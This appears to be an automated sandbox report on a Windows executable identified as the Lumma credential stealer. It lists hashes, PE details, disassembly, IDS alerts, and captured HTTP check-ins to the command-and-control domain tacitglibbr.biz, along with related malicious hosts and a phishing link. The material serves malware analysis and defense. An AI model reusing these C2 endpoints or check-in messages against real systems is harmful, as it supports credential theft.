Classification: mal100.troj.spyw.evad.winEXE@4/0@1/1
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 96%
• Number of executed functions: 41
• Number of non-executed functions: 141
Cookbook Comments:
• Found application associated with file extension: .exe
• Stop behavior analysis, all processes terminated
• Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
• Excluded IPs from analysis (whitelisted): 20.109.210.53, 13.107.246.63
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
03:44:46 | API Interceptor | 8x Sleep call for process: X2hna87N3Y.exe modified
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
104.21.50.161 | wf1Ps82LYF.exe | Get hash | malicious | LummaC | Browse |
 | NYMPo215Qd.exe | Get hash | malicious | LummaC, Stealc | Browse |
 | qvkwOs4JfC.exe | Get hash | malicious | LummaC, Stealc | Browse |
 | file.exe | Get hash | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar | Browse |
 | file.exe | Get hash | malicious | LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar | Browse |
 | 4TPPuMwzSA.exe | Get hash | malicious | LummaC, Amadey, LummaC Stealer, Stealc, Vidar | Browse |
 | hiip7UoiAq.exe | Get hash | malicious | LummaC | Browse |
 | file.exe | Get hash | malicious | LummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, Xmrig | Browse |
 | file.exe | Get hash | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar | Browse |
 | file.exe | Get hash | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar | Browse |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
tacitglibbr.biz | file.exe | Get hash | malicious | LummaC, Amadey, LummaC Stealer, Xmrig | Browse | 172.67.164.37
 | file.exe | Get hash | malicious | LummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, Xmrig | Browse | 172.67.164.37
 | wf1Ps82LYF.exe | Get hash | malicious | LummaC | Browse | 104.21.50.161
 | NYMPo215Qd.exe | Get hash | malicious | LummaC, Stealc | Browse | 104.21.50.161
 | qvkwOs4JfC.exe | Get hash | malicious | LummaC, Stealc | Browse | 104.21.50.161
 | file.exe | Get hash | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar | Browse | 104.21.50.161
 | file.exe | Get hash | malicious | LummaC, Amadey, Credential Flusher, Cryptbot, DCRat, LummaC Stealer, PureLog Stealer | Browse | 172.67.164.37
 | file.exe | Get hash | malicious | LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar | Browse | 104.21.50.161
 | UUH30xVTpr.exe | Get hash | malicious | LummaC, Stealc | Browse | 172.67.164.37
 | 4TPPuMwzSA.exe | Get hash | malicious | LummaC, Amadey, LummaC Stealer, Stealc, Vidar | Browse | 104.21.50.161
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
CLOUDFLARENETUS | TEKLİF İSTEĞİ - TUSAŞ TÜRK HAVACILIK UZAY SANAYİİ_xlsx.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 104.21.67.152
 | https://forms.gle/WXkgv9t1iFkxFXZb7 | Get hash | malicious | HTMLPhisher | Browse | 104.17.25.14
 | RkB7FehGh6.exe | Get hash | malicious | LummaC | Browse | 104.21.2.110
 | MV GOLDEN SCHULTE DETAILS.exe | Get hash | malicious | Snake Keylogger | Browse | 172.67.177.134
 | https://onedefender.xyz/w/a/s/?lp_key=17343c9645d1ac0fef5c105d161ba25127ffc78983&clickid=ctg89et00fes73cmfgu0&trk=fireclk.xyz&language=de&feed=7539&zone=3dcf5f1b&dm=1 | Get hash | malicious | Unknown | Browse | 172.67.181.93
 | c5bnEkMx.ps1 | Get hash | malicious | LummaC | Browse | 104.21.64.1
 | Instruction_695-18112-002_Rev.PDF.lnk (2).d.lnk | Get hash | malicious | Unknown | Browse | 104.21.83.229
 | sEOELQpFOB.lnk | Get hash | malicious | RedLine | Browse | 188.114.97.6
 | ref095vq842r70_classement_atout_france.pdf.lnk.d.lnk | Get hash | malicious | RedLine, SectopRAT | Browse | 188.114.97.6
 | payload_1.hta | Get hash | malicious | RedLine | Browse | 104.21.87.65
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
a0e9f5d64349fb13191bc781f81f42e1 | RkB7FehGh6.exe | Get hash | malicious | LummaC | Browse | 104.21.50.161
 | c5bnEkMx.ps1 | Get hash | malicious | LummaC | Browse | 104.21.50.161
 | DG55Gu1yGM.exe | Get hash | malicious | LummaC | Browse | 104.21.50.161
 | he55PbvM2G.exe | Get hash | malicious | LummaC | Browse | 104.21.50.161
 | SkaKk8Z1J0.exe | Get hash | malicious | LummaC | Browse | 104.21.50.161
 | N1sb7Ii2YD.exe | Get hash | malicious | LummaC | Browse | 104.21.50.161
 | file.exe | Get hash | malicious | LummaC, Amadey, LiteHTTP Bot, LummaC Stealer, RHADAMANTHYS, Xmrig | Browse | 104.21.50.161
 | file.exe | Get hash | malicious | LummaC, Amadey, Cryptbot, LiteHTTP Bot, LummaC Stealer, Stealc, Xmrig | Browse | 104.21.50.161
 | file.exe | Get hash | malicious | LummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, Xmrig | Browse | 104.21.50.161
 | file.exe | Get hash | malicious | LummaC, Amadey, LiteHTTP Bot, LummaC Stealer, RHADAMANTHYS, Xmrig | Browse | 104.21.50.161
No context
No created / dropped files found
File type:PE32 executable (console) Intel 80386, for MS Windows
Entropy (8bit):7.804689296683032
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:X2hna87N3Y.exe
File size:800'256 bytes
MD5:443f4cf9f362a96bbd0845ba6d2859f0
SHA1:1bf75dea31eaf0c26da3428ae2b8518771989522
SHA256:e11c9223741b2d1291f1031539da3dd183ce2ac4b2de705d92366c6f61d94aa5
SHA512:f43bf238027dacc972e98caff32461c680aefe1197be827348bb8bd371f85456352fbebf5bffa2381f6496466da2acef549c01c4e06c8d52727539196755db9a
SSDEEP:24576:ErtEhokkSG46ZY4vaIAaCzxZY4vaIAaCzs:ErGhokkSG4kdCzvdCzs
TLSH:FC05010170C0C072D86725BA64F6AF75AE3EF4300F766ADB9B980F799B211C19635B1A
File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....^g.........."......f........................@.......................................@.....................................P..
Icon Hash:90cececece8e8eb0
Entrypoint:0x40c312
Entrypoint Section:.text
Digitally signed:false
Imagebase:0x400000
Subsystem:windows cui
Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_ISOLATION, TERMINAL_SERVER_AWARE
Time Stamp:0x675EBBFA [Sun Dec 15 11:22:34 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:6
OS Version Minor:0
File Version Major:6
File Version Minor:0
Subsystem Version Major:6
Subsystem Version Minor:0
Import Hash:49250672a2ab6e8bdde5f4e329392300
Instruction
call 00007F5D60BBA05Ah
jmp 00007F5D60BB9EC9h
mov ecx, dword ptr [00432840h]
push esi
push edi
mov edi, BB40E64Eh
mov esi, FFFF0000h
cmp ecx, edi
je 00007F5D60BBA056h
test esi, ecx
jne 00007F5D60BBA078h
call 00007F5D60BBA081h
mov ecx, eax
cmp ecx, edi
jne 00007F5D60BBA059h
mov ecx, BB40E64Fh
jmp 00007F5D60BBA060h
test esi, ecx
jne 00007F5D60BBA05Ch
or eax, 00004711h
shl eax, 10h
or ecx, eax
mov dword ptr [00432840h], ecx
not ecx
pop edi
mov dword ptr [00432880h], ecx
pop esi
ret
push ebp
mov ebp, esp
sub esp, 14h
lea eax, dword ptr [ebp-0Ch]
xorps xmm0, xmm0
push eax
movlpd qword ptr [ebp-0Ch], xmm0
call dword ptr [00430920h]
mov eax, dword ptr [ebp-08h]
xor eax, dword ptr [ebp-0Ch]
mov dword ptr [ebp-04h], eax
call dword ptr [004308D4h]
xor dword ptr [ebp-04h], eax
call dword ptr [004308D0h]
xor dword ptr [ebp-04h], eax
lea eax, dword ptr [ebp-14h]
push eax
call dword ptr [00430968h]
mov eax, dword ptr [ebp-10h]
lea ecx, dword ptr [ebp-04h]
xor eax, dword ptr [ebp-14h]
xor eax, dword ptr [ebp-04h]
xor eax, ecx
leave
ret
mov eax, 00004000h
ret
push 00433D60h
call dword ptr [00430940h]
ret
push 00030000h
push 00010000h
push 00000000h
call 00007F5D60BC0D92h
add esp, 0Ch
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x30694 | 0x50 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x37000 | 0xe8 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x38000 | 0x1c78 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x2cb78 | 0x18 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x28ff8 | 0xc0 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x30860 | 0x17c | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x2646d | 0x26600 | 1cb7d0c9464ff9128ba37efaba3a0910 | False | 0.5475111970684039 | data | 6.556524326867543 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x28000 | 0x9bec | 0x9c00 | 878d385b80bbd700cbb2c5199eea38b8 | False | 0.43246694711538464 | data | 4.997055879664181 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x32000 | 0x252c | 0x1600 | a99215662023900c738cb0230ba36a9a | False | 0.40873579545454547 | data | 4.766185881298672 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.CODE | 0x35000 | 0xef4 | 0x1000 | 540c3f0f86009f36fac5556f91f62d2a | False | 0.498291015625 | data | 5.7055594939540075 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.tls | 0x36000 | 0x9 | 0x200 | 1f354d76203061bfdd5a53dae48d5435 | False | 0.033203125 | data | 0.020393135236084953 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x37000 | 0xe8 | 0x200 | a6b9bc0f9a7419955ff68c6924c37c42 | False | 0.306640625 | data | 2.344915704357875 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x38000 | 0x1c78 | 0x1e00 | d59be9c629a3697e2f595ead5e7c7371 | False | 0.7571614583333334 | data | 6.452492512245182 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.bss | 0x3a000 | 0x47200 | 0x47200 | ed9994771f012739118aa84a4b9096a1 | False | 1.000329525483304 | data | 7.999382444394363 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.bss | 0x82000 | 0x47200 | 0x47200 | ed9994771f012739118aa84a4b9096a1 | False | 1.000329525483304 | data | 7.999382444394363 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                RT_MANIFEST0x370600x87XML 1.0 document, ASCII textEnglishUnited States0.8222222222222222
DLL | Import
ADVAPI32.dll | CryptContextAddRef
KERNEL32.dll | AcquireSRWLockExclusive, CloseHandle, CompareStringW, CreateFileW, CreateThread, DecodePointer, DeleteCriticalSection, EncodePointer, EnterCriticalSection, EnumSystemLocalesW, ExitProcess, ExitThread, FindClose, FindFirstFileExW, FindNextFileW, FlushFileBuffers, FreeEnvironmentStringsW, FreeLibrary, FreeLibraryAndExitThread, GetACP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetConsoleMode, GetConsoleOutputCP, GetCurrentProcess, GetCurrentProcessId, GetCurrentThreadId, GetEnvironmentStringsW, GetExitCodeThread, GetFileSize, GetFileSizeEx, GetFileType, GetLastError, GetLocaleInfoW, GetModuleFileNameA, GetModuleFileNameW, GetModuleHandleA, GetModuleHandleExW, GetModuleHandleW, GetOEMCP, GetProcAddress, GetProcessHeap, GetStartupInfoW, GetStdHandle, GetStringTypeW, GetSystemTimeAsFileTime, GetUserDefaultLCID, HeapAlloc, HeapFree, HeapReAlloc, HeapSize, InitializeCriticalSectionAndSpinCount, InitializeCriticalSectionEx, InitializeSListHead, IsDebuggerPresent, IsProcessorFeaturePresent, IsValidCodePage, IsValidLocale, LCMapStringEx, LCMapStringW, LeaveCriticalSection, LoadLibraryExW, MultiByteToWideChar, QueryPerformanceCounter, RaiseException, ReadConsoleW, ReadFile, ReleaseSRWLockExclusive, RtlUnwind, SetEnvironmentVariableW, SetFilePointerEx, SetLastError, SetStdHandle, SetUnhandledExceptionFilter, SleepConditionVariableSRW, TerminateProcess, TlsAlloc, TlsFree, TlsGetValue, TlsSetValue, TryAcquireSRWLockExclusive, UnhandledExceptionFilter, WaitForSingleObjectEx, WakeAllConditionVariable, WideCharToMultiByte, WriteConsoleW, WriteFile
USER32.dll | DefWindowProcW, GetMessageW, RegisterClassW
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-17T09:44:44.702846+0100 | 2058230 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tacitglibbr .biz) | 1 | 192.168.2.4 | 54326 | 1.1.1.1 | 53 | UDP
2024-12-17T09:44:46.252787+0100 | 2058231 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI) | 1 | 192.168.2.4 | 49730 | 104.21.50.161 | 443 | TCP
2024-12-17T09:44:46.252787+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49730 | 104.21.50.161 | 443 | TCP
2024-12-17T09:44:47.246583+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.4 | 49730 | 104.21.50.161 | 443 | TCP
2024-12-17T09:44:47.246583+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49730 | 104.21.50.161 | 443 | TCP
2024-12-17T09:44:48.513726+0100 | 2058231 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI) | 1 | 192.168.2.4 | 49731 | 104.21.50.161 | 443 | TCP
2024-12-17T09:44:48.513726+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49731 | 104.21.50.161 | 443 | TCP
2024-12-17T09:44:49.565445+0100 | 2049812 | ET MALWARE Lumma Stealer Related Activity M2 | 1 | 192.168.2.4 | 49731 | 104.21.50.161 | 443 | TCP
2024-12-17T09:44:49.565445+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49731 | 104.21.50.161 | 443 | TCP
2024-12-17T09:44:51.088601+0100 | 2058231 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI) | 1 | 192.168.2.4 | 49732 | 104.21.50.161 | 443 | TCP
2024-12-17T09:44:51.088601+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49732 | 104.21.50.161 | 443 | TCP
2024-12-17T09:44:52.295457+0100 | 2048094 | ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration | 1 | 192.168.2.4 | 49732 | 104.21.50.161 | 443 | TCP
2024-12-17T09:44:53.644621+0100 | 2058231 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI) | 1 | 192.168.2.4 | 49733 | 104.21.50.161 | 443 | TCP
2024-12-17T09:44:53.644621+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49733 | 104.21.50.161 | 443 | TCP
2024-12-17T09:44:55.870029+0100 | 2058231 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI) | 1 | 192.168.2.4 | 49734 | 104.21.50.161 | 443 | TCP
2024-12-17T09:44:55.870029+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49734 | 104.21.50.161 | 443 | TCP
2024-12-17T09:44:58.597611+0100 | 2058231 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI) | 1 | 192.168.2.4 | 49735 | 104.21.50.161 | 443 | TCP
2024-12-17T09:44:58.597611+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49735 | 104.21.50.161 | 443 | TCP
2024-12-17T09:45:03.023443+0100 | 2058231 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI) | 1 | 192.168.2.4 | 49740 | 104.21.50.161 | 443 | TCP
2024-12-17T09:45:03.023443+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49740 | 104.21.50.161 | 443 | TCP
2024-12-17T09:45:06.714844+0100 | 2058231 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI) | 1 | 192.168.2.4 | 49743 | 104.21.50.161 | 443 | TCP
2024-12-17T09:45:06.714844+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49743 | 104.21.50.161 | 443 | TCP
2024-12-17T09:45:07.452999+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49743 | 104.21.50.161 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                Dec 17, 2024 09:45:03.028511047 CET49740443192.168.2.4104.21.50.161
                                                                                                                Dec 17, 2024 09:45:03.028522968 CET44349740104.21.50.161192.168.2.4
                                                                                                                Dec 17, 2024 09:45:03.028852940 CET44349740104.21.50.161192.168.2.4
                                                                                                                Dec 17, 2024 09:45:03.036089897 CET49740443192.168.2.4104.21.50.161
                                                                                                                Dec 17, 2024 09:45:03.036845922 CET49740443192.168.2.4104.21.50.161
                                                                                                                Dec 17, 2024 09:45:03.036896944 CET44349740104.21.50.161192.168.2.4
                                                                                                                Dec 17, 2024 09:45:03.037327051 CET49740443192.168.2.4104.21.50.161
                                                                                                                Dec 17, 2024 09:45:03.037363052 CET44349740104.21.50.161192.168.2.4
                                                                                                                Dec 17, 2024 09:45:03.037467003 CET49740443192.168.2.4104.21.50.161
                                                                                                                Dec 17, 2024 09:45:03.037545919 CET44349740104.21.50.161192.168.2.4
                                                                                                                Dec 17, 2024 09:45:03.037659883 CET49740443192.168.2.4104.21.50.161
                                                                                                                Dec 17, 2024 09:45:03.037693024 CET44349740104.21.50.161192.168.2.4
                                                                                                                Dec 17, 2024 09:45:03.037806034 CET49740443192.168.2.4104.21.50.161
                                                                                                                Dec 17, 2024 09:45:03.037842989 CET44349740104.21.50.161192.168.2.4
                                                                                                                Dec 17, 2024 09:45:03.037908077 CET49740443192.168.2.4104.21.50.161
                                                                                                                Dec 17, 2024 09:45:03.037918091 CET44349740104.21.50.161192.168.2.4
                                                                                                                Dec 17, 2024 09:45:03.037961960 CET49740443192.168.2.4104.21.50.161
                                                                                                                Dec 17, 2024 09:45:03.037985086 CET44349740104.21.50.161192.168.2.4
                                                                                                                Dec 17, 2024 09:45:03.038016081 CET49740443192.168.2.4104.21.50.161
                                                                                                                Dec 17, 2024 09:45:03.038039923 CET44349740104.21.50.161192.168.2.4
                                                                                                                Dec 17, 2024 09:45:03.038113117 CET49740443192.168.2.4104.21.50.161
                                                                                                                Dec 17, 2024 09:45:03.038137913 CET44349740104.21.50.161192.168.2.4
                                                                                                                Dec 17, 2024 09:45:03.038155079 CET49740443192.168.2.4104.21.50.161
                                                                                                                Dec 17, 2024 09:45:03.038172960 CET49740443192.168.2.4104.21.50.161
                                                                                                                Dec 17, 2024 09:45:03.038268089 CET49740443192.168.2.4104.21.50.161
                                                                                                                Dec 17, 2024 09:45:03.038294077 CET49740443192.168.2.4104.21.50.161
                                                                                                                Dec 17, 2024 09:45:03.079339981 CET44349740104.21.50.161192.168.2.4
                                                                                                                Dec 17, 2024 09:45:03.079529047 CET49740443192.168.2.4104.21.50.161
                                                                                                                Dec 17, 2024 09:45:03.079555988 CET49740443192.168.2.4104.21.50.161
                                                                                                                Dec 17, 2024 09:45:03.108869076 CET49740443192.168.2.4104.21.50.161
                                                                                                                Dec 17, 2024 09:45:03.108890057 CET44349740104.21.50.161192.168.2.4
                                                                                                                Dec 17, 2024 09:45:05.480267048 CET44349740104.21.50.161192.168.2.4
                                                                                                                Dec 17, 2024 09:45:05.480375051 CET44349740104.21.50.161192.168.2.4
                                                                                                                Dec 17, 2024 09:45:05.480483055 CET49740443192.168.2.4104.21.50.161
                                                                                                                Dec 17, 2024 09:45:05.480643988 CET49740443192.168.2.4104.21.50.161
                                                                                                                Dec 17, 2024 09:45:05.480664015 CET44349740104.21.50.161192.168.2.4
                                                                                                                Dec 17, 2024 09:45:05.491220951 CET49743443192.168.2.4104.21.50.161
                                                                                                                Dec 17, 2024 09:45:05.491270065 CET44349743104.21.50.161192.168.2.4
                                                                                                                Dec 17, 2024 09:45:05.491556883 CET49743443192.168.2.4104.21.50.161
                                                                                                                Dec 17, 2024 09:45:05.491739988 CET49743443192.168.2.4104.21.50.161
                                                                                                                Dec 17, 2024 09:45:05.491745949 CET44349743104.21.50.161192.168.2.4
                                                                                                                Dec 17, 2024 09:45:06.714467049 CET44349743104.21.50.161192.168.2.4
                                                                                                                Dec 17, 2024 09:45:06.714843988 CET49743443192.168.2.4104.21.50.161
                                                                                                                Dec 17, 2024 09:45:06.718406916 CET49743443192.168.2.4104.21.50.161
                                                                                                                Dec 17, 2024 09:45:06.718416929 CET44349743104.21.50.161192.168.2.4
                                                                                                                Dec 17, 2024 09:45:06.718725920 CET44349743104.21.50.161192.168.2.4
                                                                                                                Dec 17, 2024 09:45:06.726628065 CET49743443192.168.2.4104.21.50.161
                                                                                                                Dec 17, 2024 09:45:06.726628065 CET49743443192.168.2.4104.21.50.161
                                                                                                                Dec 17, 2024 09:45:06.726815939 CET44349743104.21.50.161192.168.2.4
                                                                                                                Dec 17, 2024 09:45:07.453095913 CET44349743104.21.50.161192.168.2.4
                                                                                                                Dec 17, 2024 09:45:07.453372002 CET44349743104.21.50.161192.168.2.4
                                                                                                                Dec 17, 2024 09:45:07.453458071 CET49743443192.168.2.4104.21.50.161
                                                                                                                Dec 17, 2024 09:45:07.453542948 CET49743443192.168.2.4104.21.50.161
                                                                                                                Dec 17, 2024 09:45:07.453542948 CET49743443192.168.2.4104.21.50.161
                                                                                                                Dec 17, 2024 09:45:07.453566074 CET44349743104.21.50.161192.168.2.4
                                                                                                                Dec 17, 2024 09:45:07.453572035 CET44349743104.21.50.161192.168.2.4
Timestamp                             Source Port   Dest Port   Source IP     Dest IP
Dec 17, 2024 09:44:44.702846050 CET   54326         53          192.168.2.4   1.1.1.1
Dec 17, 2024 09:44:45.018381119 CET   53            54326       1.1.1.1       192.168.2.4
Timestamp                             Source IP     Dest IP   Trans ID   OP Code              Name              Type             Class         DNS over HTTPS
Dec 17, 2024 09:44:44.702846050 CET   192.168.2.4   1.1.1.1   0xb986     Standard query (0)   tacitglibbr.biz   A (IP address)   IN (0x0001)   false
Timestamp                             Source IP   Dest IP       Trans ID   Reply Code     Name              CName   Address         Type             Class         DNS over HTTPS
Dec 17, 2024 09:44:45.018381119 CET   1.1.1.1     192.168.2.4   0xb986     No error (0)   tacitglibbr.biz   -       104.21.50.161   A (IP address)   IN (0x0001)   false
Dec 17, 2024 09:44:45.018381119 CET   1.1.1.1     192.168.2.4   0xb986     No error (0)   tacitglibbr.biz   -       172.67.164.37   A (IP address)   IN (0x0001)   false
• tacitglibbr.biz
Session ID   Source IP     Source Port   Destination IP   Destination Port   PID    Process
0            192.168.2.4   49730         104.21.50.161    443                7536   C:\Users\user\Desktop\X2hna87N3Y.exe

Timestamp: 2024-12-17 08:44:46 UTC   Bytes transferred: 262   Direction: OUT
POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: tacitglibbr.biz

Timestamp: 2024-12-17 08:44:46 UTC   Bytes transferred: 8   Direction: OUT
Data Raw: 61 63 74 3d 6c 69 66 65
Data Ascii: act=life

Timestamp: 2024-12-17 08:44:47 UTC   Bytes transferred: 1038   Direction: IN
HTTP/1.1 200 OK
Date: Tue, 17 Dec 2024 08:44:47 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=2pkqkbejmjdfev3o7aj9cshevb; expires=Sat, 12-Apr-2025 02:31:25 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pO%2FwRO9zxO9qH1ZTwmiXohayZhEWwPioOX8BcPnfPJY%2FR898wLqe2oz34RxUnqNSNBGYEYJCYv7NjHtVuqobbSIChfyOO%2FVXkGM2u0kpmPQ13CMC%2F0bwbWclYjgtT8r94I8%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f35a216c9e642ea-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=3604&min_rtt=2355&rtt_var=1775&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2838&recv_bytes=906&delivery_rate=1239915&cwnd=143&unsent_bytes=0&cid=0f55ae176e3ad717&ts=1008&x=0"

Timestamp: 2024-12-17 08:44:47 UTC   Bytes transferred: 7   Direction: IN
Data Raw: 32 0d 0a 6f 6b 0d 0a
Data Ascii: 2ok

Timestamp: 2024-12-17 08:44:47 UTC   Bytes transferred: 5   Direction: IN
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID   Source IP     Source Port   Destination IP   Destination Port   PID    Process
1            192.168.2.4   49731         104.21.50.161    443                7536   C:\Users\user\Desktop\X2hna87N3Y.exe

Timestamp: 2024-12-17 08:44:48 UTC   Bytes transferred: 263   Direction: OUT
POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 52
Host: tacitglibbr.biz

Timestamp: 2024-12-17 08:44:48 UTC   Bytes transferred: 52   Direction: OUT
Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 79 61 75 36 4e 61 2d 2d 37 39 31 31 37 33 31 39 35 34 26 6a 3d
Data Ascii: act=recive_message&ver=4.0&lid=yau6Na--7911731954&j=

Timestamp: 2024-12-17 08:44:49 UTC   Bytes transferred: 1037   Direction: IN
HTTP/1.1 200 OK
Date: Tue, 17 Dec 2024 08:44:49 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=5d59o0refr4flp0v0m9345dplo; expires=Sat, 12-Apr-2025 02:31:28 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
